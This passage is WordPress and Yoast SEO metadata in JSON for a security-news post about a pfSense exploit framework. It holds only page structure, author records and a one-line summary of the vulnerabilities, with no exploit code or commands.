redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-18T12:49:55+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41408#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41408\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41408#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 pfSense Ultimate Exploit Framework_PACKETSTORM:215799\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 pfSense Ultimate Exploit Framework_PACKETSTORM:215799 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41408","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 pfSense Ultimate Exploit Framework_PACKETSTORM:215799 - zero redgem","og_description":"{“lastseen”:”2026-02-18T17:37:05″,”description”:”This Python script is an exploitation framework targeting two authenticated remote code execution vulnerabilities in pfSense. One exploit vector is an unsafe deserialization in pfSense...","og_url":"https:\/\/zero.redgem.net\/?p=41408","og_site_name":"zero redgem","article_published_time":"2026-02-18T12:49:55+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"19 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41408#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41408"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 pfSense Ultimate Exploit Framework_PACKETSTORM:215799","datePublished":"2026-02-18T12:49:55+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41408"},"wordCount":3740,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41408#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41408","url":"https:\/\/zero.redgem.net\/?p=41408","name":"\ud83d\udcc4 pfSense Ultimate Exploit Framework_PACKETSTORM:215799 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-18T12:49:55+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41408#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41408"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41408#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 pfSense Ultimate Exploit Framework_PACKETSTORM:215799"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41408","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41408"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41408\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41408"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41408"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41408"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}